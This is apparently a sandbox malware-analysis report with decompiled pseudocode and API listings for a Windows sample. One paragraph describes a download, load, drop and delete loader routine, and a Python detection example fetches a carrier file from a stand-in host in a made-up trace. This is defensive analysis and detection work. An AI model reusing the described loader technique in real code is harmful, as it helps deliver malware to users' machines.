                                                    • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004950F9
                                                    • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                      • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,0049C9B0,00475D16,00000000,00475D3C), ref: 00409BB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                    • String ID: LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                    • API String ID: 1893608559-2695981766
                                                    • Opcode ID: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                    • Opcode Fuzzy Hash: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
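E00495084 walks a three-entry pointer table at 0x49f0f4 and, for the first non-null entry, fetches a file through the WinINet helper at 00474D50 (InternetOpenA, InternetOpenUrlA, InternetReadFile) into `<dir>\SSLLibrary.ddl`, loads that file with LoadLibraryA, calls what looks like a resource-stream load (E0041E0D0 with type 0xa, which is RT_RCDATA, and the names LIBEAY32 and SSLEAY32) followed by a save (E0041DD9C) to `\libeay32.dll` and `\ssleay32.dll`, frees the module and finally deletes the carrier (subcall 00409BAC wraps DeleteFileA). The download, load, drop, delete sequence on one file is the behaviour a hunter would key on, independent of the file name. The Python below is an added detection example and not part of this report: it correlates per-process API events in a constructed `pid|api|argument` trace format (the trace lines, the directory and the URL are made up for the example) and flags a WinINet-fetched file that is later loaded as a module and then deleted, listing the files the process wrote in between:

```python
from collections import defaultdict

# Constructed trace modelled on the call sequence in the listing above; the
# paths and the host are invented. A second, benign process is included so the
# rule has something to ignore.
SAMPLE_TRACE = [
    "9|InternetOpenUrlA|http://example.invalid/files/SSLLibrary.ddl",
    "9|CreateFileA|C:\\ProgramData\\svc\\SSLLibrary.ddl",
    "9|LoadLibraryA|C:\\ProgramData\\svc\\SSLLibrary.ddl",
    "9|FindResourceA|LIBEAY32",
    "9|CreateFileA|C:\\ProgramData\\svc\\libeay32.dll",
    "9|FindResourceA|SSLEAY32",
    "9|CreateFileA|C:\\ProgramData\\svc\\ssleay32.dll",
    "9|FreeLibrary|C:\\ProgramData\\svc\\SSLLibrary.ddl",
    "9|DeleteFileA|C:\\ProgramData\\svc\\SSLLibrary.ddl",
    "12|InternetOpenUrlA|http://example.invalid/report.pdf",
    "12|CreateFileA|C:\\Users\\u\\Downloads\\report.pdf",
]


def _basename(path_or_url):
    """Last path component, lower-cased, for both URLs and Windows paths."""
    return path_or_url.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_trace(lines):
    """Return one alert per process that fetched a file, loaded it as a module
    and then deleted it; each alert lists the files written while it was loaded."""
    fetched = defaultdict(set)      # pid -> basenames retrieved over WinINet
    carriers = {}                   # pid -> path of a fetched file passed to LoadLibraryA
    dropped = defaultdict(list)     # pid -> files written while the carrier was loaded
    alerts = []
    for line in lines:
        pid, api, arg = line.split("|", 2)
        name = _basename(arg)
        if api == "InternetOpenUrlA":
            fetched[pid].add(name)
        elif api == "LoadLibraryA" and name in fetched[pid]:
            carriers[pid] = arg
        elif api in ("CreateFileA", "WriteFile") and pid in carriers:
            if name != _basename(carriers[pid]):
                dropped[pid].append(name)
        elif api == "DeleteFileA" and pid in carriers and name == _basename(carriers[pid]):
            alerts.append({
                "pid": pid,
                "carrier": carriers.pop(pid),
                # A module loaded from a non-.dll extension is a further oddity
                # worth surfacing (the listing uses ".ddl").
                "non_dll_extension": not name.endswith(".dll"),
                "dropped": dropped.pop(pid, []),
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze_trace(SAMPLE_TRACE):
        print(alert)
```

The rule deliberately keys on the fetched-then-loaded-then-deleted carrier rather than on the string `SSLLibrary.ddl` or on the OpenSSL DLL names, since a rebuilt sample can change those while keeping the same unpacking mechanics; the written-file list is kept as context for the analyst, not as a match condition.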

                                                    C-Code - Quality: 67%
                                                    			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                    				void _v20;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t23;
                                                    				int _t24;
                                                    				struct HMONITOR__* _t27;
                                                    				struct tagMONITORINFO* _t29;
                                                    				intOrPtr* _t31;
                                                    
                                                    				_t29 = _a8;
                                                    				_t27 = _a4;
                                                    				if( *0x49e92c != 0) {
                                                    					_t24 = 0;
                                                    					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                    						_t29->rcMonitor.left = 0;
                                                    						_t29->rcMonitor.top = 0;
                                                    						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                    						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						asm("movsd");
                                                    						_t31 = _t29;
                                                    						 *(_t31 + 0x24) = 1;
                                                    						if( *_t31 >= 0x4c) {
                                                    							_push("DISPLAY");
                                                    							_push(_t31 + 0x28);
                                                    							L00407298();
                                                    						}
                                                    						_t24 = 1;
                                                    					}
                                                    				} else {
                                                    					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
                                                    					_t24 = GetMonitorInfoA(_t27, _t29);
                                                    				}
                                                    				return _t24;
                                                    			}
                                                    Statement addresses (side column of the listing above, in order): 0x0042c835 0x0042c838 0x0042c842 0x0042c867 0x0042c86f 0x0042c88f 0x0042c894 0x0042c89f 0x0042c8aa 0x0042c8b4 0x0042c8b5 0x0042c8b6 0x0042c8b7 0x0042c8b8 0x0042c8b9 0x0042c8c3 0x0042c8c5 0x0042c8cd 0x0042c8ce 0x0042c8ce 0x0042c8d3 0x0042c8d3 0x0042c844 0x0042c856 0x0042c863 0x0042c863 0x0042c8dd

                                                    APIs
                                                    • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                    • GetSystemMetrics.USER32 ref: 0042C899
                                                    • GetSystemMetrics.USER32 ref: 0042C8A4
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfo
                                                    • API String ID: 1539801207-1633989206
                                                    • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                    • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E004047C0(void* __ecx) {
                                                    				long _v4;
                                                    				int _t3;
                                                    
                                                    				if( *0x49e04c == 0) {
                                                    					if( *0x49b034 == 0) {
                                                    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                    					}
                                                    					return _t3;
                                                    				} else {
                                                    					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
                                                    						 *0x49e238();
                                                    					}
                                                    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                    					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                    • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                    • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                    • MessageBoxA.USER32 ref: 00404838
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$Message
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1570097196-2970929446
                                                    • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                    • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 39%
                                                    			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v28;
                                                    				char _v44;
                                                    				void* __edi;
                                                    				void* __ebp;
                                                    				void* _t46;
                                                    				void* _t57;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t96;
                                                    				void* _t117;
                                                    				void* _t118;
                                                    				void* _t127;
                                                    				struct HDC__* _t136;
                                                    				struct HDC__* _t137;
                                                    				intOrPtr* _t138;
                                                    				void* _t139;
                                                    
                                                    				_t119 = __ecx;
                                                    				_t135 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t118 = __eax;
                                                    				_t46 = E00447BD0(__eax);
                                                    				if(_t46 != 0) {
                                                    					_t142 = _a4;
                                                    					if(_a4 == 0) {
                                                    						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                                    						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                                    							_t138 = E00429914(1);
                                                    							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                                    							E0042AD38(_t138, 1);
                                                    							 *((intOrPtr*)( *_t138 + 0x40))();
                                                    							_t119 =  *_t138;
                                                    							 *((intOrPtr*)( *_t138 + 0x34))();
                                                    						}
                                                    						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                                    						E00419804( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                                    						_push( &_v44);
                                                    						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
                                                    						_pop(_t127);
                                                    						E00425980(_t57, _t127);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0xffffffff);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
                                                    						_push(_v8);
                                                    						_push(E00447D0C(_t118));
                                                    						L0042C454();
                                                    						E00419804(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                                    						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
                                                    						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
                                                    						_t136 = E00425C68(_t135);
                                                    						SetTextColor(_t136, 0xffffff);
                                                    						SetBkColor(_t136, 0);
                                                    						_push(0xe20746);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(_v12);
                                                    						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                    						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                    						_push(_a12 + 1);
                                                    						_t85 = _a16 + 1;
                                                    						__eflags = _t85;
                                                    						_push(_t85);
                                                    						_push(_t136);
                                                    						L004072B8();
                                                    						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
                                                    						_t137 = E00425C68(_t135);
                                                    						SetTextColor(_t137, 0xffffff);
                                                    						SetBkColor(_t137, 0);
                                                    						_push(0xe20746);
                                                    						_push(0);
                                                    						_push(0);
                                                    						_push(_v12);
                                                    						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                    						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                    						_push(_a12);
                                                    						_t96 = _a16;
                                                    						_push(_t96);
                                                    						_push(_t137);
                                                    						L004072B8();
                                                    						return _t96;
                                                    					}
                                                    					_push(_a8);
                                                    					_push(E00447A20(_t142));
                                                    					E00448008(_t118, _t142);
                                                    					_push(E00447A20(_t142));
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push(_a12);
                                                    					_push(_a16);
                                                    					_push(E00425C68(__ecx));
                                                    					_push(_v8);
                                                    					_t117 = E00447D0C(_t118);
                                                    					_push(_t117);
                                                    					L0042C454();
                                                    					return _t117;
                                                    				}
                                                    				return _t46;
                                                    			}

                                                    APIs
                                                    • 739F2430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                    • 739F2430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                    • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                    • 733B97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                      • Part of subcall function 00448008: 739F2240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ColorF2430$F2240Text
                                                    • String ID:
                                                    • API String ID: 314387739-0
                                                    • Opcode ID: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                    • Opcode Fuzzy Hash: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 45%
                                                    			E004751FC() {
                                                    				void* _v20;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v40;
                                                    				intOrPtr _v44;
                                                    				void* __ebp;
                                                    				signed int _t20;
                                                    				short _t34;
                                                    				intOrPtr* _t39;
                                                    				short* _t51;
                                                    				signed int _t52;
                                                    				short _t53;
                                                    				struct tagRECT* _t54;
                                                    
                                                    				GetWindowRect(GetDesktopWindow(), _t54);
                                                    				_t39 = E00429914(1);
                                                    				 *((intOrPtr*)( *_t39 + 0x40))();
                                                    				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
                                                    				_push(0);
                                                    				L00407638();
                                                    				_t52 = _t20;
                                                    				_push(0x26);
                                                    				_push(_t52);
                                                    				L00407380();
                                                    				if((_t20 & 0x00000100) == 0x100) {
                                                    					_t51 = E0040275C(0x404);
                                                    					E004032B4(_t51, 0x404);
                                                    					 *_t51 = 0x300;
                                                    					_t6 = _t51 + 4; // 0x4
                                                    					_t34 = _t6;
                                                    					_push(_t34);
                                                    					_push(0x100);
                                                    					_push(0);
                                                    					_push(_t52);
                                                    					L004073C0();
                                                    					_t53 = _t34;
                                                    					 *((short*)(_t51 + 2)) = _t53;
                                                    					if(_t53 != 0) {
                                                    						L00407308();
                                                    						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
                                                    					}
                                                    					E0040277C(_t51);
                                                    				}
                                                    				_push(0xcc0020);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(_t52);
                                                    				_push(_v32 - _v40);
                                                    				_push(_v36 - _v44);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(E00425C68(E00429EDC(_t39)));
                                                    				L004072B8();
                                                    				_push(_t52);
                                                    				_push(0);
                                                    				L00407888();
                                                    				return _t39;
                                                    			}

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00475204
                                                    • GetWindowRect.USER32 ref: 0047520A
                                                    • 733AAC50.USER32(00000000), ref: 0047523C
                                                    • 733AAD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                    • 733AAEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                    • 733AA8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                    • 733B97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
                                                    • 733AB380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$B380DesktopRect
                                                    • String ID:
                                                    • API String ID: 2454875651-0
                                                    • Opcode ID: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                    • Opcode Fuzzy Hash: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 26%
                                                    			E004265A0(void* __ebx) {
                                                    				intOrPtr _v8;
                                                    				char _v1000;
                                                    				char _v1004;
                                                    				char _v1032;
                                                    				signed int _v1034;
                                                    				short _v1036;
                                                    				void* _t24;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t29;
                                                    				intOrPtr _t45;
                                                    				intOrPtr _t52;
                                                    				void* _t54;
                                                    				void* _t55;
                                                    
                                                    				_t54 = _t55;
                                                    				_v1036 = 0x300;
                                                    				_v1034 = 0x10;
                                                    				_t25 = E004029DC(_t24, 0x40,  &_v1032);
                                                    				_push(0);
                                                    				L00407638();
                                                    				_v8 = _t25;
                                                    				_push(_t54);
                                                    				_push(0x42669d);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t55 + 0xfffffbf8;
                                                    				_push(0x68);
                                                    				_t27 = _v8;
                                                    				_push(_t27);
                                                    				L00407380();
                                                    				_t45 = _t27;
                                                    				if(_t45 >= 0x10) {
                                                    					_push( &_v1032);
                                                    					_push(8);
                                                    					_push(0);
                                                    					_push(_v8);
                                                    					L004073C0();
                                                    					if(_v1004 != 0xc0c0c0) {
                                                    						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                    						_push(8);
                                                    						_push(_t45 - 8);
                                                    						_push(_v8);
                                                    						L004073C0();
                                                    					} else {
                                                    						_push( &_v1004);
                                                    						_push(1);
                                                    						_push(_t45 - 8);
                                                    						_push(_v8);
                                                    						L004073C0();
                                                    						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                    						_push(7);
                                                    						_push(_t45 - 7);
                                                    						_push(_v8);
                                                    						L004073C0();
                                                    						_push( &_v1000);
                                                    						_push(1);
                                                    						_push(7);
                                                    						_push(_v8);
                                                    						L004073C0();
                                                    					}
                                                    				}
                                                    				_pop(_t52);
                                                    				 *[fs:eax] = _t52;
                                                    				_push(0x4266a4);
                                                    				_t29 = _v8;
                                                    				_push(_t29);
                                                    				_push(0);
                                                    				L00407888();
                                                    				return _t29;
                                                    			}

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 004265CE
                                                    • 733AAD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                    • 733AAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                    • 733AAEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                    • 733AAEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                    • 733AAEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                    • 733AAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                    • 733AB380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380
                                                    • String ID:
                                                    • API String ID: 120756276-0
                                                    • Opcode ID: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                    • Opcode Fuzzy Hash: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                    				char _v5;
                                                    				char _v12;
                                                    				char _v13;
                                                    				struct tagMENUITEMINFOA _v61;
                                                    				char _v68;
                                                    				intOrPtr _t103;
                                                    				CHAR* _t109;
                                                    				char _t115;
                                                    				short _t149;
                                                    				void* _t154;
                                                    				intOrPtr _t161;
                                                    				intOrPtr _t184;
                                                    				struct HMENU__* _t186;
                                                    				int _t190;
                                                    				void* _t192;
                                                    				intOrPtr _t193;
                                                    				void* _t196;
                                                    				void* _t205;
                                                    
                                                    				_t155 = __ecx;
                                                    				_v68 = 0;
                                                    				_v12 = 0;
                                                    				_v5 = __ecx;
                                                    				_t186 = __edx;
                                                    				_t154 = __eax;
                                                    				_push(_t196);
                                                    				_push(0x44abbb);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t196 + 0xffffffc0;
                                                    				if( *((char*)(__eax + 0x3e)) == 0) {
                                                    					L22:
                                                    					_pop(_t161);
                                                    					 *[fs:eax] = _t161;
                                                    					_push(0x44abc2);
                                                    					E004049C0( &_v68);
                                                    					return E004049C0( &_v12);
                                                    				}
                                                    				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                    				if(E0044C8DC(_t154) <= 0) {
                                                    					__eflags =  *((short*)(_t154 + 0x60));
                                                    					if( *((short*)(_t154 + 0x60)) == 0) {
                                                    						L8:
                                                    						if((GetVersion() & 0x000000ff) < 4) {
                                                    							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
                                                    							_t103 = E0044C8DC(_t154);
                                                    							__eflags = _t103;
                                                    							if(_t103 <= 0) {
                                                    								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
                                                    							} else {
                                                    								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
                                                    								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
                                                    							}
                                                    							goto L22;
                                                    						}
                                                    						_v61.cbSize = 0x2c;
                                                    						_v61.fMask = 0x3f;
                                                    						_t192 = E0044CE98(_t154);
                                                    						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
                                                    							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                    								L14:
                                                    								_t115 = 0;
                                                    								goto L16;
                                                    							}
                                                    							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                    							if(_t205 == 0) {
                                                    								goto L15;
                                                    							}
                                                    							goto L14;
                                                    						} else {
                                                    							L15:
                                                    							_t115 = 1;
                                                    							L16:
                                                    							_v13 = _t115;
                                                    							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
                                                    							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
                                                    							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                    							_v61.hSubMenu = 0;
                                                    							_v61.hbmpChecked = 0;
                                                    							_v61.hbmpUnchecked = 0;
